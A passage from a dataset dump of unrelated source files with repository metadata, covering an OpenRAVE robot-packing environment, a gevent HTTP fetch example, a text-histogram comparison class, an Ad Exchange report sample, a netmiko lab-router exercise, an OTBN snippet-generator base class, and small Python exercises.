    objects = {'center': center_objs}
    return objects
def place_objs_in_region(objs, region, env):
    """Place each body in ``objs`` inside ``region`` via randomly_place_region.

    NOTE(review): the ``env`` argument is unused here — presumably
    randomly_place_region operates on the body's own environment; confirm.
    """
    for obj in objs:
        randomly_place_region(obj, region)
def generate_poses_and_place_shelf_objs(objects, regions, env):
    """Randomly place the shelf objects into their regions and record poses.

    Only the 'center' region is currently active; the left/right/top variants
    are disabled below. Returns a dict mapping each placed body's name to its
    pose (as produced by get_pose).
    """
    """
    left_objs = objects['left']
    left_region = regions['left']
    left_top_objs = objects['left_top']
    left_top_region = regions['left_top']
    right_objs = objects['right']
    right_region = regions['right']
    right_top_objs = objects['right_top']
    right_top_region = regions['right_top']
    """
    center_objs = objects['center']
    center_region = regions['center']
    # center_top_objs = objects['center_top']
    # center_top_region = regions['center_top']
    # place_objs_in_region(left_objs, left_region, env)
    # place_objs_in_region(left_top_objs, left_top_region, env)
    # place_objs_in_region(right_objs, right_region, env)
    # place_objs_in_region(right_top_objs, right_top_region, env)
    place_objs_in_region(center_objs, center_region, env)
    # place_objs_in_region(center_top_objs, center_top_region, env)
    # Collect name -> pose for every object we were given (placed or not).
    obj_poses = {obj.GetName(): get_pose(obj) for obj_list in objects.values() for obj in obj_list}
    return obj_poses
def set_fixed_obj_poses(env):
    """Look up the fixed furniture bodies ('table1', 'shelf1').

    NOTE(review): the retrieved bodies are assigned to locals but never used
    and no poses are actually set — this appears to be an unfinished stub.
    """
    table1 = env.GetKinBody('table1')
    shelf = env.GetKinBody('shelf1')
def create_environment_region(name, xy, extents, z=None):
    """Build an axis-aligned region centred at ``xy`` with the given half-extents.

    Args:
        name: region name passed through to AARegion.
        xy: (x, y) centre of the region.
        extents: (x_half_extent, y_half_extent).
        z: region height; defaults to 0.138 when omitted.

    Returns:
        An AARegion drawn in translucent yellow.
    """
    if z is None:
        z = 0.138
    x_lo, x_hi = xy[0] - extents[0], xy[0] + extents[0]
    y_lo, y_hi = xy[1] - extents[1], xy[1] + extents[1]
    return AARegion(name, ((x_lo, x_hi), (y_lo, y_hi)), z,
                    color=np.array((1, 1, 0, 0.25)))
class MoverEnvironmentDefinition:
    """Builds the 'mover' manipulation problem in an OpenRAVE environment.

    Loads the mover_env.xml scene, prepares IK models for the PR2's arms,
    creates walls/doors/shelves and their objects, defines the named planning
    regions (home, loading, bridge, entire), and collects everything into
    ``self.problem_config`` for retrieval via get_problem_config().
    """

    def __init__(self, env):
        """Construct the full problem inside ``env`` (an OpenRAVE environment).

        Has heavy side effects: loads bodies into ``env``, moves the robot,
        and randomly places objects.
        """
        # Room half-extents and door placement parameters.
        x_extents = 3.5
        y_extents = 3.16
        door_width = 1.5  # generate_rand(1, 1.5)
        door_x = (-x_extents + 1.5 + x_extents - 1.5) / 2.0 - x_extents * 0.3 + 4
        door_y = (-y_extents + 1.5 + y_extents - 1.5) / 2.0
        door_th = 0
        # todo move all the kitchen objects by 0.5
        fdir = os.path.dirname(os.path.abspath(__file__))
        env.Load(fdir + '/resources/mover_env.xml')
        # set_xy(env.GetKinBody('kitchen'), 0, 0.5)
        robot = env.GetRobots()[0]
        # left arm IK
        robot.SetActiveManipulator('leftarm')
        manip = robot.GetActiveManipulator()
        ee = manip.GetEndEffector()
        ikmodel1 = databases.inversekinematics.InverseKinematicsModel(robot=robot,
                                                                      iktype=IkParameterization.Type.Transform6D,
                                                                      forceikfast=True, freeindices=None,
                                                                      freejoints=None, manip=None)
        # Generate the ikfast model on first run; load the cached one afterwards.
        if not ikmodel1.load():
            ikmodel1.autogenerate()
        # right arm torso IK
        robot.SetActiveManipulator('rightarm_torso')
        manip = robot.GetActiveManipulator()
        ee = manip.GetEndEffector()
        ikmodel2 = databases.inversekinematics.InverseKinematicsModel(robot=robot,
                                                                      iktype=IkParameterization.Type.Transform6D)
        # forceikfast=True, freeindices=None,
        # freejoints=None, manip=None)
        if not ikmodel2.load():
            ikmodel2.autogenerate()
        # Static scene geometry and initial robot arm configuration.
        create_bottom_walls(x_extents, y_extents, env)
        create_doors(x_extents, y_extents, door_x, door_y, door_width, door_th, env)
        set_config(robot, FOLDED_LEFT_ARM, robot.GetManipulator('leftarm').GetArmIndices())
        set_config(robot, mirror_arm_config(FOLDED_LEFT_ARM), robot.GetManipulator('rightarm').GetArmIndices())
        fixed_obj_poses = set_fixed_object_poses(env, x_extents, y_extents)
        # Shelves and the objects that live on them.
        shelf_shapes, shelf_xs = generate_shelf_shapes()
        shelf_regions = create_shelves(env, shelf_shapes, shelf_xs, 'table2')
        obj_shapes = generate_shelf_obj_shapes()
        shelf_objects = create_shelf_objs(env, obj_shapes)
        shelf_obj_poses = generate_poses_and_place_shelf_objs(shelf_objects, shelf_regions, env)
        for region_name, region in zip(shelf_regions.keys(), shelf_regions.values()):
            region.name = region_name + '_shelf_region'
        # Named planning regions.
        home_region_xy = [x_extents / 2.0, 0]
        home_region_xy_extents = [x_extents, y_extents]
        home_region = AARegion('home_region',
                               ((-x_extents + x_extents / 2.0, x_extents + x_extents / 2.0), (-y_extents, y_extents)),
                               z=0.135, color=np.array((1, 1, 0, 0.25)))
        loading_region_xy = [1.8, -6.7]
        loading_region_xy_extents = [2.5, 1.85]
        loading_region = AARegion('loading_region', ((loading_region_xy[0] - loading_region_xy_extents[0],
                                                      loading_region_xy[0] + loading_region_xy_extents[0]),
                                                     (loading_region_xy[1] - loading_region_xy_extents[1],
                                                      loading_region_xy[1] + loading_region_xy_extents[1])),
                                  z=0.135, color=np.array((1, 1, 0, 0.25)))
        bridge_region_name = 'bridge_region'
        bridge_region_xy = [0.7, -4.1]
        bridge_region_extents = [1, 1.0]
        bridge_region = create_environment_region(bridge_region_name, bridge_region_xy, bridge_region_extents)
        entire_region_xy = [x_extents / 2.0, -2.9]
        entire_region_xy_extents = [x_extents, y_extents + 3.1]
        entire_region = AARegion('entire_region', (
            (-entire_region_xy_extents[0] + entire_region_xy[0], entire_region_xy_extents[0] + entire_region_xy[0]),
            (-entire_region_xy_extents[1] + entire_region_xy[1], entire_region_xy_extents[1] + entire_region_xy[1])),
            z=0.135, color=np.array((1, 1, 0, 0.25)))
        # Packing boxes plus the robot start in the loading region.
        packing_box_names = ['square_packing_box1', 'rectangular_packing_box1', 'square_packing_box2',
                             'rectangular_packing_box2', 'square_packing_box3', 'rectangular_packing_box3',
                             'square_packing_box4', 'rectangular_packing_box4']
        packing_boxes = [env.GetKinBody(pname) for pname in packing_box_names]
        place_objs_in_region(packing_boxes, loading_region, env)
        place_objs_in_region([robot], loading_region, env)
        open_gripper(robot)
        """
        box_regions = {}
        for box in packing_boxes:
            box_region = AARegion.create_on_body(box)
            box_region.color = (1., 1., 0., 0.25)
            box_regions[box.GetName()] = box_region
            if box == packing_boxes[0]:
                xytheta = get_body_xytheta(box)
                set_obj_xytheta([xytheta[0, 0], xytheta[0, 1], 0], box)
            box_region.draw(env)
        """
        # Movable objects = everything that is not scenery/robot/boxes/obstacles.
        temp_objects_to_pack = [body for body in env.GetBodies() if
                                body.GetName().find('box') == -1 and body.GetName().find('wall') == -1 and
                                body.GetName().find('sink') == -1 and body.GetName().find('kitchen') == -1 and
                                body.GetName().find('entrance') == -1 and body.GetName().find('pr2') == -1 and
                                body.GetName().find('floorwalls') == -1 and body.GetName().find('table') == -1 and
                                body.GetName().find('obst') == -1]
        # packing boxes are packed in the order given in packing_boxes
        # 1. packing boxes in the home
        # 2. big objects in the truck
        # 3. small objects in the box
        # 4. shelf objects in the box
        # 5. boxes in the truck
        big_objects_to_pack = [body for body in env.GetBodies()
                               if body.GetName().find('chair') != -1 or body.GetName().find('shelf') != -1]
        objects_to_pack = [obj for obj in temp_objects_to_pack if obj not in big_objects_to_pack]
        objects = objects_to_pack + big_objects_to_pack
        # Bundle everything the planner needs into one config dict.
        self.problem_config = {'shelf_objects': shelf_objects,
                               'packing_boxes': packing_boxes,
                               'objects_to_pack': objects_to_pack,
                               'big_objects_to_pack': big_objects_to_pack,
                               'home_region': home_region,
                               'loading_region': loading_region,
                               'entire_region': entire_region,
                               'entire_region_xy': entire_region_xy,
                               'entire_region_extents': entire_region_xy_extents,
                               'bridge_region': bridge_region,
                               'bridge_region_xy': bridge_region_xy,
                               'bridge_region_extents': bridge_region_extents,
                               'env': env,
                               'loading_region_xy': loading_region_xy,
                               'loading_region_extents': loading_region_xy_extents,
                               'home_region_xy': home_region_xy,
                               'home_region_extents': home_region_xy_extents,
                               'shelf_regions': shelf_regions,
                               'objects': objects}
        # import pdb;pdb.set_trace()
        """
        # for corl presentation purpose
        for p in packing_boxes: set_color(p, [0, 0, 0])
        set_color('rectangular_packing_box3', [1, 0, 0])
        set_color('rectangular_packing_box1', [0, 1, 0])
        set_color('rectangular_packing_box4', [0, 1, 1])
        """

    def get_problem_config(self):
        """Return the problem-configuration dict assembled by __init__."""
        return self.problem_config
| [
"beomjoon@mit.edu"
] | beomjoon@mit.edu |
e69e9f01a37105c49a7d07b7d0f7bf4f565436b7 | 8e3a02a5e104a14a1aa3ba3ba0f05596a9f73757 | /examples/test_gevent.py | 4789c8a0d20458c547189e187018ec4dcc5f1168 | [
"MIT"
] | permissive | jengdal/restkit | 9f114f0f7ded7217cb0c9d405dd1af469c9a918a | e32ff0c3d72415c998353644313bbc02805faa6c | refs/heads/master | 2021-01-18T06:02:55.463294 | 2012-07-19T10:39:32 | 2012-07-19T10:39:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 785 | py | import timeit
from gevent import monkey; monkey.patch_all()
import gevent
from restkit import *
from restkit.conn import Connection
from socketpool import ConnectionPool
#set_logging("debug")

# Shared connection pool using gevent-compatible sockets.
pool = ConnectionPool(factory=Connection, backend="gevent")

urls = [
    "http://yahoo.fr",
    "http://google.com",
    "http://friendpaste.com",
    "http://benoitc.io",
    "http://couchdb.apache.org"]

# Repeat the URL list 10 times to get a 50-request workload.
allurls = []
for i in range(10):
    allurls.extend(urls)
def fetch(u):
    # Issue an HTTP GET (following redirects) through the shared pool and
    # report the status code and body length. (Python 2 print statement.)
    r = request(u, follow_redirect=True, pool=pool)
    print "RESULT: %s: %s (%s)" % (u, r.status, len(r.body_string()))
def extract():
    # Spawn one greenlet per URL and block until every fetch completes.
    jobs = [gevent.spawn(fetch, url) for url in allurls]
    gevent.joinall(jobs)
# Time a single full concurrent crawl and print the elapsed seconds.
t = timeit.Timer(stmt=extract)
print "%.2f s" % t.timeit(number=1)
| [
"bchesneau@gmail.com"
] | bchesneau@gmail.com |
def build_profile(first, last, **user_info):
    """Build a dictionary describing a user.

    Args:
        first: the user's first name (stored under 'first_name').
        last: the user's last name (stored under 'last_name').
        **user_info: any number of extra attributes, stored as-is.

    Returns:
        A dict with 'first_name', 'last_name', and all extra attributes.
    """
    # Seed with the required names, then merge the arbitrary extras in one
    # call instead of copying them key by key.
    profile = {'first_name': first, 'last_name': last}
    profile.update(user_info)
    return profile
# Demo: build a profile with the two required names plus arbitrary extras.
# (The 'benjiming'/'frankling'/'filed' spellings are preserved — they are data.)
user_profile = build_profile('benjiming', 'frankling',
                             location='chengdu',
                             filed='computer science and technology',
                             dream='study')
print(user_profile)
| [
"645334483@qq.com"
] | 645334483@qq.com |
1b7d543aa7cbb7b19a285e7d31a77ff3a6c069a8 | dbfc8ca4dbdef6002b0738dd4c30d569eb9e36c3 | /test/metadata/inbound/plugins/test_plugins_1000_0006_srtm.py | 2d729241c31eb65866a3e9474c3784cc474aaa64 | [] | no_license | GISdeveloper2017/imetadata | da32e35215cc024a2e5d244ee8afc375c296550d | 58516401a054ff0d25bfb244810a37838c4c8cf6 | refs/heads/master | 2023-03-26T06:38:28.721553 | 2021-03-06T09:32:06 | 2021-03-06T09:32:06 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,698 | py | # -*- coding: utf-8 -*-
# @Time : 2020/12/4 09:05
# @Author : 王西亚
# @File : test_plugins_aaa.py
import allure
import pytest
import settings
from imetadata.base.c_file import CFile
from imetadata.base.c_utils import CUtils
from imetadata.business.metadata.base.fileinfo.c_dmFilePathInfoEx import CDMFilePathInfoEx
from imetadata.business.metadata.base.plugins.c_plugins import CPlugins
from imetadata.business.metadata.inbound.plugins.dir.plugins_1000_0006_srtm import plugins_1000_0006_srtm
from test.metadata.inbound.plugins.plugins_test_base import Plugins_Test_Base
@allure.feature("天津测绘SRTM")  # Module title (translated: Tianjin surveying SRTM)
class Test_plugins_1000_0006_srtm(Plugins_Test_Base):
    """Inbound-plugin test for the SRTM directory plugin (plugins_1000_0006_srtm)."""

    def create_plugins(self, file_info: CDMFilePathInfoEx = None) -> CPlugins:
        # Factory hook used by the base test class to build the plugin under test.
        return plugins_1000_0006_srtm(file_info)

    def test_file_info_list(self):
        # Fixture list: one directory named 'srtm' (under '202008') that the
        # plugin should confirm as a known object.
        return [
            {
                self.Name_Test_File_Type: self.FileType_Dir,
                self.Name_Test_file_path: '202008{0}srtm'.format(CFile.sep()),
                self.Name_Test_object_confirm: self.Object_Confirm_IKnown,
                self.Name_Test_object_name: 'srtm'
            }
        ]

    def init_before_test(self):
        # Resolve the test-data root and the plugin-catalog subdirectory from
        # application settings before the tests run.
        plugins_info = self.create_plugins().get_information()
        plugins_catalog = CUtils.dict_value_by_name(plugins_info, CPlugins.Plugins_Info_Catalog_Title, '')
        self._test_file_root_path = settings.application.xpath_one(self.Path_Setting_Dir_Test_Data, '')
        self._test_file_parent_path = CFile.join_file(
            settings.application.xpath_one(self.Path_Setting_Dir_Test_Data, ''),
            plugins_catalog
        )
)
# Allow running this test module directly (outside a pytest invocation).
if __name__ == '__main__':
    pytest.main()
| [
"18437918096@163.COM"
] | 18437918096@163.COM |
7b795505b76f7218da50a6a9bf53221773d8cfae | 4738be4be8cda375e33ef606dbe82998d6e60bef | /common_nlp/word_histogram_comparison.py | 9cb68293cb5cf094917ad90f252498d2c754186e | [
"MIT"
] | permissive | Arieugon/Pesquisas | 39723d6ee642d50708f4a883b8d13faf5d018c3c | 87e3923c571d44774c36d4bc54e444cb1003b43b | refs/heads/master | 2023-01-21T10:23:53.645736 | 2020-12-02T19:23:48 | 2020-12-02T19:23:48 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,920 | py | from scipy.spatial import distance as dist
try:
from textNormalization import textNormalization
except:
from common_nlp.textNormalization import textNormalization
import numpy as np
class word_histogram_comparison():
    """Compare texts via word-frequency histograms and scipy distance metrics.

    Texts are converted to {word: count} histograms with the project's
    textNormalization helper; distances between aligned histograms are
    computed with the callables registered in ``scipy_methods``.
    """

    def __init__(self):
        # Distance functions selectable by display name.
        self.scipy_methods = {
            "Euclidean": dist.euclidean,
            "Manhattan": dist.cityblock,
            "Chebysev": dist.chebyshev
        }

    def compare_two_hist(self, histA, histB, method):
        """Return ``method(histA, histB)`` — the distance between two vectors."""
        return method(histA, histB)

    def compare_all_all(self, texts, method):
        """Compare every text against all the others.

        Args:
            texts: sequence of (id, text) pairs.
            method: distance callable taking two aligned count vectors.

        Returns:
            {id_A: {id_B: distance, ...}, ...}

        NOTE(review): the loop stops at len(texts) - 1, so the last text never
        serves as reference text A — confirm this truncation is intentional.
        """
        results = {}
        for i in range(len(texts) - 1):
            textA = texts[i]
            other_texts = texts[:i] + texts[i + 1:]
            results[textA[0]] = self.compare_one_all(textA, other_texts, method)
        return results

    def compare_one_all(self, textA, texts, method):
        """Distance from one (id, text) pair to each pair in ``texts``.

        Only words present in BOTH histograms contribute to the aligned
        vectors passed to ``method``.

        Returns:
            {id: distance} for every (id, text) in ``texts``.
        """
        txt_nrm = textNormalization()
        results = {}
        id_A, text_A = textA
        histA = txt_nrm.text_to_hist(text_A)
        for id_t, text_t in texts:
            histogram_A_aux = []
            histogram_T_aux = []
            histogram_t = txt_nrm.text_to_hist(text_t)
            for k, v in histA.items():
                if k in histogram_t:
                    histogram_A_aux.append(v)
                    histogram_T_aux.append(histogram_t[k])
            results[id_t] = method(histogram_A_aux, histogram_T_aux)
        return results

    def texts_to_mean_hist(self, texts, method):
        """Average the word histograms of ``texts`` into one {word: mean count}.

        The ``method`` parameter is currently unused; it is kept for interface
        compatibility with the other comparison methods.
        """
        # Bug fix: Counter was used here without ever being imported in this
        # module, so calling this method raised NameError.
        from collections import Counter
        aux_hist = Counter()
        final_hist = {}
        txt_nrm = textNormalization()
        for t in texts:
            aux_hist += txt_nrm.text_to_hist(t)
        aux_hist = dict(aux_hist)
        texts_size = len(texts)
        for k, v in aux_hist.items():
            final_hist[k] = v / texts_size
        return final_hist

    def mean_hist_dist_texts(self, texts, method):
        """Mean and std-dev of each text's average distance to the others.

        Returns:
            (mean, std) tuple.

        NOTE(review): elements of ``texts`` are passed straight to
        ``compare_two_hist``/``method`` without histogram conversion, the
        outer loop skips the last element, and the final mean divides by
        len(texts) despite summing len(texts) - 1 terms — verify these are
        intended before relying on the numbers.
        """
        mean_hist = 0
        sd_hist = []
        for i in range(len(texts) - 1):
            textA = texts[i]
            other_texts = texts[:i] + texts[i + 1:]
            mean_aux = 0
            for j in range(len(other_texts)):
                mean_aux += self.compare_two_hist(textA, other_texts[j], method)
            mean_aux = mean_aux / len(other_texts)
            mean_hist += mean_aux
            sd_hist.append(mean_aux)
        return (mean_hist / len(texts), np.std(sd_hist))
| [
"danilopcarlotti@gmail.com"
] | danilopcarlotti@gmail.com |
72565b8fc05ad482fa524703a4d1c515750710d6 | b66bf5a58584b45c76b9d0c5bf828a3400ecbe04 | /week-03/day-1/hello_dictionary.py | 4019dd86864bc5aa97b59c9b4cbf5f586bf557d3 | [] | no_license | greenfox-velox/szepnapot | 1196dcb4be297f12af7953221c27cd1a5924cfaa | 41c3825b920b25e20b3691a1680da7c10820a718 | refs/heads/master | 2020-12-21T08:11:41.252889 | 2016-08-13T10:07:15 | 2016-08-13T10:07:15 | 58,042,932 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 585 | py | import requests
import re
from bs4 import BeautifulSoup
# Fetch the article that lists "hello" in 20 languages.
r = requests.get('http://pocketcultures.com/2008/10/30/say-hello-in-20-languages/')
raw_html = r.text
soup = BeautifulSoup(raw_html, 'html.parser')
# On this page each greeting/language entry sits inside a <strong> tag.
strongs = soup("strong")
GREETINGS = {}  # intended greeting -> language map; population is still disabled below
hellos = r'\d+\.\s([A-Z]+\s?[A-Z]+.).?'  # captures the uppercase greeting after 'N. '
language = r'\d+.+\–\s([A-Za-z\s()]+)'  # captures the language/country after the dash
for i in strongs:
    i = i.text
    print(i)
    # if i[0].isdigit():
    #     hello_parts = re.match(hellos, i).group(1)
    #     # hy = (''.join(hello_parts)).capitalize()
    #     print(hello_parts)
    #     # country = re.match(language, i).group(0)
    #     # print(country)
| [
"silentpocok@gmail.com"
] | silentpocok@gmail.com |
97070ee6a3ede702c56f5d8433c185084a2ec962 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_201/2321.py | cef4f2742fcb1a85496d41097792834162b31ccd | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 717 | py | from heapq import *
t = int(input())  # read a line with a single integer
for i in range(1, t + 1):
    # N stalls in a row, `people` arrivals; each person occupies the middle
    # of the currently largest empty gap, splitting it in two.
    N, people = [int(s) for s in input().split(" ")]
    # Min-heap of (N - gap_size): popping the minimum yields the LARGEST gap.
    h = []
    heappush(h, 0)
    while people:
        people -= 1
        biggestSpace = N - heappop(h)
        if biggestSpace % 2 == 1:
            # Odd gap: both resulting sub-gaps equal (gap - 1) // 2, so a
            # single value covers both max and min for the last person.
            if people == 0:
                result = [int(biggestSpace/2)]
            heappush(h, N - int(biggestSpace/2))
            heappush(h, N - int(biggestSpace/2))
        else:
            # Even gap: sub-gaps are gap//2 - 1 and gap//2.
            if people == 0:
                result = [(int(biggestSpace/2) - 1), int(biggestSpace/2)]
            heappush(h, N - (int(biggestSpace/2) - 1))
            heappush(h, N - int(biggestSpace/2))
print("Case #{}: {} {}".format(i, max(result), min(result))) | [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
d924bb3f2ebc12d7519019fe62a01ce3fb6635e0 | dac960516a8b99ec7f0727282c4a9f1e58dcaa22 | /python/samples/v1_x/list_performance_report.py | cc73d135bcc413e5a63cb99be4fec1ea3518e208 | [
"Apache-2.0"
] | permissive | Baldri/googleads-adxbuyer-examples | 948da55e981cb85bfda1e4027beb482f29d1d87a | 285469fe1fff28416d0477c22e59746525694988 | refs/heads/master | 2023-02-22T18:50:29.166146 | 2020-04-17T20:52:22 | 2020-04-17T20:52:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,479 | py | #!/usr/bin/python
#
# Copyright 2016 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This example lists the given account's Performance Report."""
import argparse
import pprint
import os
import sys
sys.path.insert(0, os.path.abspath('..'))
from googleapiclient.errors import HttpError
import samples_util
# Placeholder defaults; replace these (or pass the corresponding command-line
# flags) before running the sample.
DEFAULT_ACCOUNT_ID = 'INSERT_ACCOUNT_ID'
DEFAULT_END_DATE_TIME = 'INSERT_END_DATE_TIME_HERE'  # YYYY-MM-DD
DEFAULT_START_DATE_TIME = 'INSERT_START_DATE_TIME_HERE'  # YYYY-MM-DD
DEFAULT_MAX_PAGE_SIZE = samples_util.MAX_PAGE_SIZE
def main(ad_exchange_buyer, account_id, start_date_time, end_date_time,
         max_results):
    """Fetch and pretty-print the given account's performance report.

    Args:
        ad_exchange_buyer: initialized Ad Exchange Buyer API service object.
        account_id: int, id of the account the report is retrieved for.
        start_date_time: str, report start in YYYY-MM-DD (UTC).
        end_date_time: str, report end in YYYY-MM-DD (UTC).
        max_results: int, maximum number of entries per result page.
    """
    try:
        # Construct and execute the request.
        report = ad_exchange_buyer.performanceReport().list(
            accountId=account_id,
            startDateTime=start_date_time,
            endDateTime=end_date_time,
            maxResults=max_results).execute()
        print('Successfully retrieved the report.')
        pprint.pprint(report)
    except HttpError as e:
        # API-level failures (bad account, auth, quota, ...) surface here.
        print(e)
if __name__ == '__main__':
    # Optional arguments; overrides default values if set.
    parser = argparse.ArgumentParser(description='Retrieves list of performance '
                                                 'metrics.')
    parser.add_argument('-a', '--account_id', required=False, type=int,
                        default=DEFAULT_ACCOUNT_ID,
                        help=('The integer id of the account you\'re retrieving '
                              'the report for.'))
    parser.add_argument('-s', '--start_date_time', required=False,
                        default=DEFAULT_START_DATE_TIME,
                        help=('The start time of the report in ISO 8601 '
                              'timestamp format using UTC. (YYYY-MM-DD)'))
    parser.add_argument('-e', '--end_date_time', required=False,
                        default=DEFAULT_END_DATE_TIME,
                        help=('The end time of the report in ISO 8601 timestamp '
                              'format using UTC. (YYYY-MM-DD)'))
    parser.add_argument('-m', '--max_results', required=False, type=int,
                        default=DEFAULT_MAX_PAGE_SIZE,
                        help=('The maximum number of entries returned on one '
                              'result page.'))
    args = parser.parse_args()
    # NOTE(review): argparse applies type= only to values given on the command
    # line, so with -a omitted args.account_id keeps the truthy placeholder
    # string default and this branch is still taken — confirm the else branch
    # is ever reachable.
    if args.account_id:
        ACCOUNT_ID = args.account_id
        START_DATE_TIME = args.start_date_time
        END_DATE_TIME = args.end_date_time
        MAX_RESULTS = args.max_results
    else:
        ACCOUNT_ID = int('INSERT_ACCOUNT_ID')
        START_DATE_TIME = 'YYYY-MM-DD'  # Insert startDateTime here.
        END_DATE_TIME = 'YYYY-MM-DD'  # Insert endDateTime here.
        MAX_RESULTS = samples_util.MAX_PAGE_SIZE
    try:
        service = samples_util.GetService()
    except IOError as ex:
        # Credentials/key-file problems are reported and the sample exits.
        print(f'Unable to create adexchangebuyer service - {ex}')
        print('Did you specify the key file in samples_util.py?')
        sys.exit(1)
    main(service, ACCOUNT_ID, START_DATE_TIME, END_DATE_TIME, MAX_RESULTS)
| [
"msaniscalchi@users.noreply.github.com"
] | msaniscalchi@users.noreply.github.com |
63cccd1521fb66bffc03c4ee7187a82d5af2de60 | 4c10305652193f7b1df8af4dfe28742910f07fcf | /hw/ip/otbn/util/rig/snippet_gen.py | 50d736d4072bbf9555a1219d46d06987be6eb924 | [
"LicenseRef-scancode-unknown-license-reference",
"Apache-2.0"
] | permissive | jake-ke/opentitan | fc162fd3ec2dc3dff7cec6745379ea5aa3d7a5e0 | a7b16226ce13752896a71399910e39c7a5bda88a | refs/heads/master | 2023-07-05T12:38:49.186899 | 2021-01-21T22:38:13 | 2021-01-22T02:16:20 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,802 | py | # Copyright lowRISC contributors.
# Licensed under the Apache License, Version 2.0, see LICENSE for details.
# SPDX-License-Identifier: Apache-2.0
'''A module defining a base class for a snippet generator.
The generators in the ./gens/ subdirectory all derive from this class. To
actually generate some snippets, use the wrapper in snippet_gens.py.
'''
from typing import Callable, Optional, Tuple
from shared.insn_yaml import Insn, InsnsFile
from .program import Program
from .model import Model
from .snippet import Snippet
# A continuation type that allows a generator to recursively generate some more
# stuff.
GenCont = Callable[[Model, Program], Optional[Tuple[Snippet, Model]]]
# The return type of a single generator. This is a tuple (snippet, model).
# snippet is a generated snippet. If the program is done (i.e. every execution
# ends with ecall) then model is None. Otherwise it is a Model object
# representing the state of the processor after executing the code in the
# snippet(s).
GenRet = Tuple[Snippet, Optional[Model]]
class SnippetGen:
'''A parameterised sequence of instructions
These can be added to the instructions generated so far for a given random
binary.
'''
def gen(self,
cont: GenCont,
model: Model,
program: Program) -> Optional[GenRet]:
'''Try to generate instructions for this type of snippet.
On success, inserts the instructions into program, updates the model,
and returns a GenRet tuple. See comment above the type definition for
more information.
On failure, leaves program and model unchanged and returns None. There
should always be at least one snippet generator with positive weight
(see pick_weight below) that succeeds unconditionally. This will be the
ecall generator. Failure is interpreted as "this snippet won't work
with the current program state", but the generator may be retried
later.
The cont argument is a continuation, used to call out to more
generators in order to do recursive generation. It takes a (mutable)
model and program and picks a sequence of instructions. The paths
through the generated code don't terminate with an ECALL but instead
end up at the resulting model.pc.
'''
raise NotImplementedError('gen not implemented by subclass')
def pick_weight(self,
model: Model,
program: Program) -> float:
'''Pick a weight by which to multiply this generator's default weight
This is called for each generator before we start trying to generate a
snippet for a given program and model state. This can be used to
disable a generator when we know it won't work (if model.fuel is too
small, for example).
It can also be used to alter weights depending on where we are in the
program. For example, a generator that generates ecall to end the
program could decrease its weight when size is large, to avoid
generating tiny programs by accident.
The default implementation always returns 1.0.
'''
return 1.0
def _get_named_insn(self, insns_file: InsnsFile, mnemonic: str) -> Insn:
'''Get an instruction from insns_file by mnemonic
This is used for specialized snippets that need to generate a specific
instruction and wraps the error handling for when someone has removed
the instruction from the file.
'''
insn = insns_file.mnemonic_to_insn.get(mnemonic.lower())
if insn is None:
raise RuntimeError('No {} instruction in instructions file.'
.format(mnemonic.upper()))
return insn
| [
"rswarbrick@gmail.com"
] | rswarbrick@gmail.com |
4860167b800f06c9498077979e99c03567633e94 | 9737a5e2cfe5521bb9731a356a7639d0dc3692de | /Exercises/week_2_netmiko/exercise6d.py | 88af3c6a3aa08b2bb55ebe967bd9c0ba844d1c91 | [] | no_license | akushnirubc/pyneta | 5c53cbcf42e2450ce6a2d7e6591d671661e84ba0 | ee68205c0b91974ea1cd79b8c06c36ae083fb02c | refs/heads/main | 2023-06-18T18:02:56.242732 | 2021-07-13T21:43:51 | 2021-07-13T21:43:51 | 358,647,513 | 0 | 0 | null | 2021-05-24T21:39:18 | 2021-04-16T15:45:34 | JavaScript | UTF-8 | Python | false | false | 1,272 | py | # Using SSH and netmiko connect to the Cisco4 router. In your device definition, specify both an 'secret' and a 'session_log'. Your device definition should look as follows:
# password = getpass()
# device = {
# "host": "cisco4.lasthop.io",
# "username": "pyclass",
# "password": password,
# "secret": password,
# "device_type": "cisco_ios",
# "session_log": "my_output.txt",
# }
# Execute the following sequence of events using Netmiko:
# Use the write_channel() method to send the 'disable' command down the SSH channel.
# Note, write_channel is a low level method so it requires that you add a newline to the end of your 'disable' command.
from netmiko import ConnectHandler
from getpass import getpass
password = getpass()
device = {
"host": "cisco4.lasthop.io",
"username": "pyclass",
"password": password,
"secret": password,
"device_type": "cisco_ios",
"session_log": "my_output.txt",
}
net_connect = ConnectHandler(**device)
print("\nExit priviledged exec (disable), Current prompt")
net_connect.write_channel("disable\n")
print ("\n>>>>>>>")
# print("Config mode check: {}".format(net_connect.exit_config_mode())
print("Current Prompt: {}".format(net_connect.find_prompt()))
print()
net_connect.disconnect() | [
"alex.kushnir@ubc.ca"
] | alex.kushnir@ubc.ca |
40355038bf589f532800b1282ca963ededb8e481 | bf0c13d412a7021b299c5e0622e63e72172cf725 | /week1/Hackerrank/easy/finding_percentage.py | 559579e9933496e2810d3b9115a6d038eedc180f | [] | no_license | Alibek120699/BFDjango | 765e734e925041947f607a1d15228309dfa3e647 | eac06c317551c561ffccb44750862972ae11dea3 | refs/heads/master | 2022-12-01T15:49:39.402815 | 2020-04-19T21:09:39 | 2020-04-19T21:09:39 | 233,657,360 | 0 | 0 | null | 2022-11-22T05:49:56 | 2020-01-13T17:50:13 | Python | UTF-8 | Python | false | false | 377 | py | if __name__ == '__main__':
n = int(input())
student_marks = {}
